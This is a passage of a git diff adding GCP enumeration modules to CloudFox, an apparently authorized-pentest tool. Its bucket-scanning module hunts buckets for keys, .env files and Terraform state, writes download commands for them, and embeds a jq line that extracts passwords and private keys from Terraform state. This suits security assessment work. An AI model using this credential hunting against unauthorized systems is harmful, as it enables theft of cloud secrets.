BeyondCorpOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go new file mode 100644 index 00000000..7a0baead --- /dev/null +++ b/gcp/commands/bigtable.go @@ -0,0 +1,135 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLE_MODULE_NAME, + Aliases: []string{"bt"}, + Short: "Enumerate Cloud Bigtable instances", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables.`, + Run: runGCPBigtableCommand, +} + +type BigtableModule struct { + gcpinternal.BaseGCPModule + Instances []bigtableservice.BigtableInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BigtableOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLE_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []bigtableservice.BigtableInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) + return + } + + tableCount := 0 + for _, instance := range m.Instances { + tableCount += len(instance.Tables) + } + + logger.SuccessM(fmt.Sprintf("Found %d Bigtable instance(s) with %d table(s)", + len(m.Instances), tableCount), globals.GCP_BIGTABLE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + svc := bigtableservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Bigtable instances: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() +} + +func (m *BigtableModule) initializeLootFiles() { + m.LootMap["bigtable-instances"] = &internal.LootFile{ + Name: "bigtable-instances", + Contents: "# Bigtable Instances\n# Generated by CloudFox\n\n", + } +} + +func (m *BigtableModule) addToLoot(instance bigtableservice.BigtableInstanceInfo) { + m.LootMap["bigtable-instances"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n# Type: %s\n# Tables: %s\n# Clusters: %d\n\n", + instance.Name, instance.DisplayName, instance.Type, + strings.Join(instance.Tables, ", "), + len(instance.Clusters)) +} + +func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{"Name", "Display Name", "Type", "Tables", "Clusters", "State", "Project"} + + var body [][]string + for _, instance := range m.Instances { + body = append(body, []string{ + instance.Name, + instance.DisplayName, + instance.Type, + strings.Join(instance.Tables, ", "), + fmt.Sprintf("%d", len(instance.Clusters)), + instance.State, + instance.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BigtableOutput{ + Table: []internal.TableFile{{Name: "bigtable", Header: header, Body: body}}, + Loot: lootFiles, + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) +} diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go new file mode 100644 index 00000000..8f65bd01 --- /dev/null +++ b/gcp/commands/bucketenum.go @@ -0,0 +1,391 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bucketenumservice "github.com/BishopFox/cloudfox/gcp/services/bucketEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bucketEnumMaxObjects int +) + +var GCPBucketEnumCommand = &cobra.Command{ + Use: globals.GCP_BUCKETENUM_MODULE_NAME, + Aliases: []string{"bucket-scan", "gcs-enum", "sensitive-files"}, + Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", + Long: `Enumerate GCS buckets to find potentially sensitive files. + +This module scans bucket contents for files that may contain: +- Credentials (service account keys, SSH keys, certificates) +- Secrets (environment files, API keys, tokens) +- Configuration files (may contain hardcoded secrets) +- Database backups +- Terraform state files +- Source code/git repositories + +File categories detected: +- Credential: .json keys, .pem, .key, .p12, SSH keys +- Secret: .env, passwords, API keys, tokens +- Config: YAML, properties, settings files +- Backup: SQL dumps, archives +- Source: Git repositories +- Cloud: Cloud Functions source, build artifacts + +WARNING: This may take a long time for buckets with many objects. +Use --max-objects to limit the scan.`, + Run: runGCPBucketEnumCommand, +} + +func init() { + GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (0 for unlimited)") +} + +type BucketEnumModule struct { + gcpinternal.BaseGCPModule + SensitiveFiles []bucketenumservice.SensitiveFileInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type BucketEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BucketEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + SensitiveFiles: []bucketenumservice.SensitiveFileInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (max %d objects per bucket)...", bucketEnumMaxObjects), globals.GCP_BUCKETENUM_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + + if len(m.SensitiveFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range m.SensitiveFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(m.SensitiveFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + svc := bucketenumservice.New() + + // Get list of buckets + buckets, err := svc.GetBucketsList(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing buckets in project %s: %v", projectID, err), globals.GCP_BUCKETENUM_MODULE_NAME) + } + return + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + // Scan each bucket + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error scanning bucket %s: %v", bucketName, err), globals.GCP_BUCKETENUM_MODULE_NAME) + } + continue + } + + m.mu.Lock() + m.SensitiveFiles = append(m.SensitiveFiles, files...) + for _, file := range files { + m.addFileToLoot(file) + } + m.mu.Unlock() + } +} + +func (m *BucketEnumModule) initializeLootFiles() { + m.LootMap["bucket-sensitive-files"] = &internal.LootFile{ + Name: "bucket-sensitive-files", + Contents: "# GCS Sensitive Files\n# Generated by CloudFox\n\n", + } + m.LootMap["bucket-download-commands"] = &internal.LootFile{ + Name: "bucket-download-commands", + Contents: "# GCS Download Commands for Sensitive Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["bucket-credentials"] = &internal.LootFile{ + Name: "bucket-credentials", + Contents: "# Potential Credential Files in GCS\n# Generated by CloudFox\n# CRITICAL: These may contain service account keys or secrets\n\n", + } + m.LootMap["bucket-configs"] = &internal.LootFile{ + Name: "bucket-configs", + Contents: "# Configuration Files in GCS\n# Generated by CloudFox\n# May contain hardcoded secrets\n\n", + } + m.LootMap["bucket-terraform"] = &internal.LootFile{ + Name: "bucket-terraform", + Contents: "# Terraform State Files in GCS\n# Generated by CloudFox\n# CRITICAL: Terraform state contains all secrets in plaintext!\n\n", + } +} + +func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInfo) { + // All sensitive files + m.LootMap["bucket-sensitive-files"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Bucket: %s\n"+ + "## Object: %s\n"+ + "## Category: %s\n"+ + "## Description: %s\n"+ + "## Size: %d bytes\n"+ + "## Updated: %s\n\n", + file.RiskLevel, file.Category, + file.BucketName, + file.ObjectName, + file.Category, + file.Description, + file.Size, + file.Updated, + ) + + // Download commands + m.LootMap["bucket-download-commands"].Contents += fmt.Sprintf( + "# [%s] %s - %s\n%s\n\n", + file.RiskLevel, file.Category, file.ObjectName, + file.DownloadCmd, + ) + + // Credentials specifically + if file.Category == "Credential" || file.RiskLevel == "CRITICAL" { + m.LootMap["bucket-credentials"].Contents += fmt.Sprintf( + "## [CRITICAL] %s\n"+ + "## Bucket: gs://%s/%s\n"+ + "## Description: %s\n"+ + "## Download: %s\n\n", + file.ObjectName, + file.BucketName, file.ObjectName, + file.Description, + file.DownloadCmd, + ) + } + + // Config files + if file.Category == "Config" { + m.LootMap["bucket-configs"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Bucket: gs://%s/%s\n"+ + "## Description: %s\n"+ + "## Download: %s\n\n", + file.RiskLevel, file.ObjectName, + file.BucketName, file.ObjectName, + file.Description, + file.DownloadCmd, + ) + } + + // Terraform state files specifically + if strings.Contains(strings.ToLower(file.ObjectName), "tfstate") || + strings.Contains(strings.ToLower(file.ObjectName), "terraform") { + m.LootMap["bucket-terraform"].Contents += fmt.Sprintf( + "## [CRITICAL] Terraform State Found!\n"+ + "## Bucket: gs://%s/%s\n"+ + "## Size: %d bytes\n"+ + "## Download: %s\n"+ + "## \n"+ + "## After download, extract secrets with:\n"+ + "## cat %s | jq -r '.resources[].instances[].attributes | select(.password != null or .secret != null or .private_key != null)'\n"+ + "## \n\n", + file.BucketName, file.ObjectName, + file.Size, + file.DownloadCmd, + strings.ReplaceAll(file.ObjectName, "/", "_"), + ) + } +} + +func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main sensitive files table + header := []string{ + "Risk", + "Category", + "Bucket", + "Object Name", + "Size", + "Description", + "Project", + } + + var body [][]string + for _, file := range m.SensitiveFiles { + // Truncate long object names + objName := file.ObjectName + if len(objName) > 50 { + objName = "..." + objName[len(objName)-47:] + } + + body = append(body, []string{ + file.RiskLevel, + file.Category, + file.BucketName, + objName, + formatFileSize(file.Size), + file.Description, + file.ProjectID, + }) + } + + // Critical files table + critHeader := []string{ + "Bucket", + "Object Name", + "Category", + "Description", + "Download Command", + } + + var critBody [][]string + for _, file := range m.SensitiveFiles { + if file.RiskLevel == "CRITICAL" { + critBody = append(critBody, []string{ + file.BucketName, + file.ObjectName, + file.Category, + file.Description, + file.DownloadCmd, + }) + } + } + + // By bucket summary + bucketCounts := make(map[string]int) + for _, file := range m.SensitiveFiles { + bucketCounts[file.BucketName]++ + } + + bucketHeader := []string{ + "Bucket", + "Sensitive Files", + "Project", + } + + var bucketBody [][]string + bucketProjects := make(map[string]string) + for _, file := range m.SensitiveFiles { + bucketProjects[file.BucketName] = file.ProjectID + } + for bucket, count := range bucketCounts { + bucketBody = append(bucketBody, []string{ + bucket, + fmt.Sprintf("%d", count), + bucketProjects[bucket], + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "bucket-enum", + Header: header, + Body: body, + }, + } + + if len(critBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-critical", + Header: critHeader, + Body: critBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL files (potential credentials)!", len(critBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + } + + if len(bucketBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-summary", + Header: bucketHeader, + Body: bucketBody, + }) + } + + output := BucketEnumOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) + } +} + +func formatFileSize(bytes int64) string { + const ( + KB = 1024 + MB = KB * 1024 + GB = MB * 1024 + ) + + switch { + case bytes >= GB: + return fmt.Sprintf("%.1f GB", float64(bytes)/GB) + case bytes >= MB: + return fmt.Sprintf("%.1f MB", float64(bytes)/MB) + case bytes >= KB: + return fmt.Sprintf("%.1f KB", float64(bytes)/KB) + default: + return fmt.Sprintf("%d B", bytes) + } +} diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go new file mode 100644 index 00000000..02f9390d --- /dev/null +++ b/gcp/commands/certmanager.go @@ -0,0 +1,433 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCertManagerCommand = &cobra.Command{ + Use: globals.GCP_CERTMANAGER_MODULE_NAME, + Aliases: []string{"certs", "certificates", "ssl"}, + Short: "Enumerate SSL/TLS certificates and find expiring or misconfigured certs", + Long: `Enumerate SSL/TLS certificates from Certificate Manager and Compute Engine. + +This module finds all certificates and identifies security issues: +- Expired or soon-to-expire certificates +- Failed certificate issuance +- Wildcard certificates (higher impact if compromised) +- Self-managed certificates that need manual renewal + +Security Relevance: +- Expired certificates cause outages and security warnings +- Wildcard certificates can be abused to MITM any subdomain +- Certificate domains reveal infrastructure and services +- Self-managed certs may have exposed private keys + +What this module finds: +- Certificate Manager certificates (global) +- Compute Engine SSL certificates (classic) +- Certificate maps +- Expiration status +- Associated domains`, + Run: runGCPCertManagerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CertManagerModule struct { + gcpinternal.BaseGCPModule + + Certificates []certmanagerservice.Certificate + SSLCertificates []certmanagerservice.SSLCertificate + CertMaps []certmanagerservice.CertificateMap + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CertManagerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CertManagerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CertManagerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CERTMANAGER_MODULE_NAME) + if err != nil { + return + } + + module := &CertManagerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Certificates: []certmanagerservice.Certificate{}, + SSLCertificates: []certmanagerservice.SSLCertificate{}, + CertMaps: []certmanagerservice.CertificateMap{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) + + totalCerts := len(m.Certificates) + len(m.SSLCertificates) + + if totalCerts == 0 { + logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) + return + } + + // Count expiring/expired certs + expiringCount := 0 + expiredCount := 0 + + for _, cert := range m.Certificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + for _, cert := range m.SSLCertificates { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", + totalCerts, len(m.CertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + + if expiredCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + if expiringCount > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d certificate(s) expire within 30 days", expiringCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CertManagerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking certificates in project: %s", projectID), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + svc := certmanagerservice.New() + + // Get Certificate Manager certs + certs, err := svc.GetCertificates(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting certificates for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) + } + } + + // Get classic SSL certs + sslCerts, err := svc.GetSSLCertificates(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting SSL certificates for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) + } + } + + // Get certificate maps + certMaps, err := svc.GetCertificateMaps(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting certificate maps for %s: %v", projectID, err), globals.GCP_CERTMANAGER_MODULE_NAME) + } + } + + m.mu.Lock() + m.Certificates = append(m.Certificates, certs...) + m.SSLCertificates = append(m.SSLCertificates, sslCerts...) + m.CertMaps = append(m.CertMaps, certMaps...) + + for _, cert := range certs { + m.addCertToLoot(cert) + } + for _, cert := range sslCerts { + m.addSSLCertToLoot(cert) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CertManagerModule) initializeLootFiles() { + m.LootMap["all-certificates"] = &internal.LootFile{ + Name: "all-certificates", + Contents: "# SSL/TLS Certificates\n# Generated by CloudFox\n\n", + } + m.LootMap["expiring-certificates"] = &internal.LootFile{ + Name: "expiring-certificates", + Contents: "# Expiring/Expired Certificates\n# Generated by CloudFox\n# These certificates need immediate attention!\n\n", + } + m.LootMap["certificate-domains"] = &internal.LootFile{ + Name: "certificate-domains", + Contents: "# Domains from Certificates\n# Generated by CloudFox\n# Useful for subdomain enumeration\n\n", + } + m.LootMap["wildcard-certificates"] = &internal.LootFile{ + Name: "wildcard-certificates", + Contents: "# Wildcard Certificates\n# Generated by CloudFox\n# High impact if private key is exposed\n\n", + } +} + +func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { + // All certificates + m.LootMap["all-certificates"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s | Location: %s\n"+ + "## Type: %s | State: %s\n"+ + "## Domains: %s\n"+ + "## Expires: %s (%d days)\n", + cert.RiskLevel, cert.Name, + cert.ProjectID, cert.Location, + cert.Type, cert.State, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) + for _, reason := range cert.RiskReasons { + m.LootMap["all-certificates"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["all-certificates"].Contents += "\n" + + // Expiring certificates + if cert.DaysUntilExpiry <= 30 { + status := "EXPIRING" + if cert.DaysUntilExpiry < 0 { + status = "EXPIRED" + } + m.LootMap["expiring-certificates"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s\n"+ + "## Domains: %s\n"+ + "## Expires: %s (%d days)\n\n", + status, cert.Name, + cert.ProjectID, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) + } + + // Domains + for _, domain := range cert.Domains { + m.LootMap["certificate-domains"].Contents += domain + "\n" + } + + // Wildcard certificates + for _, domain := range cert.Domains { + if strings.HasPrefix(domain, "*") { + m.LootMap["wildcard-certificates"].Contents += fmt.Sprintf( + "## %s (Project: %s)\n"+ + "## Wildcard Domain: %s\n"+ + "## If the private key is compromised, an attacker can MITM any subdomain\n"+ + "## Check for: key material in repos, backups, logs, or developer machines\n\n", + cert.Name, cert.ProjectID, domain, + ) + break + } + } +} + +func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { + // All certificates + m.LootMap["all-certificates"].Contents += fmt.Sprintf( + "## [%s] %s (SSL Certificate)\n"+ + "## Project: %s | Type: %s\n"+ + "## Domains: %s\n"+ + "## Expires: %s (%d days)\n", + cert.RiskLevel, cert.Name, + cert.ProjectID, cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) + for _, reason := range cert.RiskReasons { + m.LootMap["all-certificates"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["all-certificates"].Contents += "\n" + + // Expiring certificates + if cert.DaysUntilExpiry <= 30 { + status := "EXPIRING" + if cert.DaysUntilExpiry < 0 { + status = "EXPIRED" + } + m.LootMap["expiring-certificates"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s\n"+ + "## Domains: %s\n"+ + "## Expires: %s (%d days)\n\n", + status, cert.Name, + cert.ProjectID, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, cert.DaysUntilExpiry, + ) + } + + // Domains + for _, domain := range cert.Domains { + m.LootMap["certificate-domains"].Contents += domain + "\n" + } + + // Wildcard certificates + for _, domain := range cert.Domains { + if strings.HasPrefix(domain, "*") { + m.LootMap["wildcard-certificates"].Contents += fmt.Sprintf( + "## %s (Project: %s)\n"+ + "## Wildcard Domain: %s\n"+ + "## If the private key is compromised, an attacker can MITM any subdomain\n\n", + cert.Name, cert.ProjectID, domain, + ) + break + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Combined certificates table + header := []string{"Risk", "Name", "Type", "Domains", "Expires", "Days Left", "Project"} + var body [][]string + + for _, cert := range m.Certificates { + domains := strings.Join(cert.Domains, ", ") + if len(domains) > 40 { + domains = domains[:37] + "..." + } + + daysLeft := fmt.Sprintf("%d", cert.DaysUntilExpiry) + if cert.DaysUntilExpiry < 0 { + daysLeft = "EXPIRED" + } + + body = append(body, []string{ + cert.RiskLevel, + cert.Name, + cert.Type, + domains, + cert.ExpireTime, + daysLeft, + cert.ProjectID, + }) + } + + for _, cert := range m.SSLCertificates { + domains := strings.Join(cert.Domains, ", ") + if len(domains) > 40 { + domains = domains[:37] + "..." + } + + daysLeft := fmt.Sprintf("%d", cert.DaysUntilExpiry) + if cert.DaysUntilExpiry < 0 { + daysLeft = "EXPIRED" + } + + body = append(body, []string{ + cert.RiskLevel, + cert.Name, + cert.Type, + domains, + cert.ExpireTime, + daysLeft, + cert.ProjectID, + }) + } + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: header, + Body: body, + }) + } + + // Certificate maps table + if len(m.CertMaps) > 0 { + mapHeader := []string{"Risk", "Name", "Location", "Entries", "Certificates", "Project"} + var mapBody [][]string + + for _, certMap := range m.CertMaps { + certs := strings.Join(certMap.Certificates, ", ") + if len(certs) > 40 { + certs = certs[:37] + "..." + } + + mapBody = append(mapBody, []string{ + certMap.RiskLevel, + certMap.Name, + certMap.Location, + fmt.Sprintf("%d", certMap.EntryCount), + certs, + certMap.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "certificate-maps", + Header: mapHeader, + Body: mapBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := CertManagerOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go new file mode 100644 index 00000000..dd8a859a --- /dev/null +++ b/gcp/commands/cloudarmor.go @@ -0,0 +1,398 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudArmorCommand = &cobra.Command{ + Use: globals.GCP_CLOUDARMOR_MODULE_NAME, + Aliases: []string{"armor", "waf", "security-policies"}, + Short: "Enumerate Cloud Armor security policies and find weaknesses", + Long: `Enumerate Cloud Armor security policies and identify misconfigurations. + +Cloud Armor provides DDoS protection and WAF (Web Application Firewall) capabilities +for Google Cloud load balancers. + +Security Relevance: +- Misconfigured policies may not actually block attacks +- Preview-only rules don't block, just log +- Missing OWASP rules leave apps vulnerable to common attacks +- Unprotected load balancers have no WAF protection + +What this module finds: +- All Cloud Armor security policies +- Policy weaknesses and misconfigurations +- Rules in preview mode (not blocking) +- Load balancers without Cloud Armor protection +- Missing adaptive protection (DDoS)`, + Run: runGCPCloudArmorCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudArmorModule struct { + gcpinternal.BaseGCPModule + + Policies []cloudarmorservice.SecurityPolicy + UnprotectedLBs map[string][]string // projectID -> LB names + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudArmorOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudArmorOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudArmorOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDARMOR_MODULE_NAME) + if err != nil { + return + } + + module := &CloudArmorModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Policies: []cloudarmorservice.SecurityPolicy{}, + UnprotectedLBs: make(map[string][]string), + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject) + + // Count unprotected LBs + totalUnprotected := 0 + for _, lbs := range m.UnprotectedLBs { + totalUnprotected += len(lbs) + } + + if len(m.Policies) == 0 && totalUnprotected == 0 { + logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME) + return 